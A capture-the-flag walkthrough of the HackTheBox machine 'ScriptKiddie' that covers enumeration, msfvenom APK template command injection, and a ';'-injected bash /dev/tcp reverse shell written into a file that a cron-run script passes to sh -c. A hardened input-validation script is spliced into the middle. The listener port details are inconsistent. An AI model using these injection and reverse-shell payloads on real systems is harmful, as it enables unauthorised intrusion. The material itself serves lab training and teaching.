
HackTheBox — ScriptKiddie Walkthrough

InfoCard

This article is about how I rooted the machine “ScriptKiddie” from HackTheBox.

Enumeration

nmap -sC -sV 10.10.10.226 -o nmap

-sC — Default script scan

-sV — Service/Version scan

-o — save the output

We have 2 open ports: 22, 5000.

Visit 10.10.10.226:5000.

Home Page

It’s a simple website, where we can use some pentesting tools.

Let’s fire up “gobuster” against it.

gobuster dir -w /usr/share/dirb/wordlists/common.txt -x php,txt,html -u http://10.10.10.226:5000 -o gobuster

dir — scan for directories

-w — specify wordlist

-x — specify extensions

-u — specify url

-o — save output

We get nothing useful.

Getting a reverse shell

The default syntax for using “searchsploit” is - “searchsploit [parameter]”

We can try searching for “openssh; whoami”, so the executed command will be “searchsploit openssh; whoami”.

“whoami” will be executed after “searchsploit openssh”

We get the following message:

We can try other characters that might be useful, like “||” and “&&”, but all of them are blocked.

Let’s try to find exploits for detected services and versions.

searchsploit OpenSSH 8.2p1; searchsploit Werkzeug httpd 0.16.1

Nothing comes out.

Google “Werkzeug/0.16.1 exploit” and we find “Werkzeug Debug Shell Command Execution”

Let’s try it.

Fire up metasploit…

msfconsole

and follow the instructions

use exploit/multi/http/werkzeug_debug_rce

Set required options and run.

It doesn’t work.

Back on the home page, we can see that we have an option to upload a template file for windows, linux and android.

Let’s google “windows template file”, “linux template file”, “android template file”.

Nothing useful comes up.

Maybe we’re forgetting something, maybe a magic word!

Google “android template file exploit” and we find “Rapid7 Metasploit Framework msfvenom APK Template Command Injection”

Let’s start metasploit again and follow the instructions.

We generated a template file for android.

Now, let’s start the netcat listener on port 4444 and upload the template.

nc -lvnp 1234

Choose android, the template file and any IP.

Click “generate”, wait a few seconds and we get a reverse shell.

Stabilize the shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

We get a shell as a user “kid”.

Go to kid’s home directory and grab the user’s flag.

Horizontal Privilege Escalation

sudo -l

We’re asked for a password, we don’t know it.

View cronjobs

cat /etc/crontab

Nothing useful here, either.

Going to the /home directory, we see that there’s another user, “pwn”.

In pwn’s home directory, we find a bash script called “scanlosers.sh”.

It’s owned and executed by “pwn”. If we could write into it directly and then execute it, we would get a second reverse shell as the user “pwn”, but we have neither write nor execute permission on it. We have to find another way around.

Notice the “hackers” file mentioned in the script.

It’s owned by us and we can write into it.

If we try to write something into it, it gets cleared instantly, so there’s some hidden job that empties it over and over again.

Maybe the same kind of hidden job executes “scanlosers.sh”. If that’s true, the problem of not having “execute” permission is solved, but we still have to somehow pass a reverse shell to it.

If we take a closer look at “scanlosers.sh”, we notice that it reads the “hackers” file line by line and runs nmap against each entry. nmap is executed via /bin/sh.

If we write the following line into the hackers file:

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.172/1234 0>&1' #" >> hackers

The command executed by the script would be:

sh -c "nmap --top-ports 10 -oN recon/ ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.172/1234 0>&1' #..."

“;” terminates the nmap command, so whatever follows it runs as a separate command.

/bin/bash -c — means that the command that follows it will be executed by “bash”.

Then we have a standard bash reverse shell (don’t forget to change the IP and port).

# — means that everything after it is treated as a comment. It’s just plain text and won’t be executed, so it doesn’t matter what the script appends after our line.

So we get something that works with the same logic as SQL injection: untrusted input is concatenated into a command string, and a metacharacter in the input changes how that string is parsed.
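As an added example from the defender’s side (this is not the machine’s own scanlosers.sh, only a hardened stand-in for a script of that shape): the fix for this class of bug is to validate each line as a dotted-quad IPv4 address and to place the address into nmap’s argv directly instead of interpolating it into a string for `sh -c`, so no byte of the input can become shell syntax. The variable names HACKERS_FILE, RECON_DIR and NMAP_BIN are assumptions; nmap is only called when NMAP_BIN is set, so the script runs offline and just reports how many lines it would have accepted or dropped.

```sh
#!/bin/sh
# Added example: hardened stand-in for a "scan every host listed in a file"
# job. NOT the box's own scanlosers.sh. Assumed names: HACKERS_FILE (one host
# per line), RECON_DIR (where reports go) and NMAP_BIN (path to nmap; when
# unset, nothing is executed and the script only validates the input).
HACKERS_FILE="${HACKERS_FILE:-hackers}"
RECON_DIR="${RECON_DIR:-recon}"

# Accept only a dotted-quad IPv4 address (four numeric octets, each 0-255).
# Anything else, including lines carrying spaces, ';', quotes or '#', is
# rejected before it can reach a command.
is_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    saved_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$saved_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] || return 1
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Scan a single host. The address is passed as its own argv element; there is
# no sh -c and no string interpolation, so the input is never re-parsed.
scan_host() {
    host=$1
    if ! is_ipv4 "$host"; then
        printf 'rejected: %s\n' "$host" >&2
        return 1
    fi
    if [ -n "${NMAP_BIN:-}" ]; then
        mkdir -p "$RECON_DIR"
        "$NMAP_BIN" --top-ports 10 -oN "$RECON_DIR/$host" "$host"
    fi
    return 0
}

# Walk the file line by line and print "<accepted> <rejected>" so a cron job
# or log collector can see how many lines were dropped as malformed.
process_file() {
    accepted=0
    rejected=0
    while IFS= read -r line || [ -n "$line" ]; do
        if scan_host "$line" 2>/dev/null; then
            accepted=$((accepted + 1))
        else
            rejected=$((rejected + 1))
        fi
    done < "$1"
    printf '%s %s\n' "$accepted" "$rejected"
}

# Stand-alone run: only if the input file exists.
if [ -f "$HACKERS_FILE" ]; then
    process_file "$HACKERS_FILE"
fi
```

The rejected count is the detection hook: a job like this should never see non-address lines in a file it owns, so a non-zero second number is worth alerting on. Dropping the file’s world-writable permission removes the injection path entirely; the validation is the defence that holds when a permission mistake slips through.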

Start a new netcat listener on a different port, one that’s not currently being used by another process.

nc -lvnp 1234

Write the reverse shell into the “hackers” file:

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.172/1234 0>&1' #" >> hackers

As soon as we hit enter, we get a second reverse shell, as the user “pwn”.

Horizontal Privilege Escalation

sudo -l

We can start Metasploit with root privileges (root) without using a password (NOPASSWD).

sudo /opt/metasploit-framework-6.0.9/msfconsole

Valuable lesson learned: MAGIC WORD MAKES IMPOSSIBLE POSSIBLE!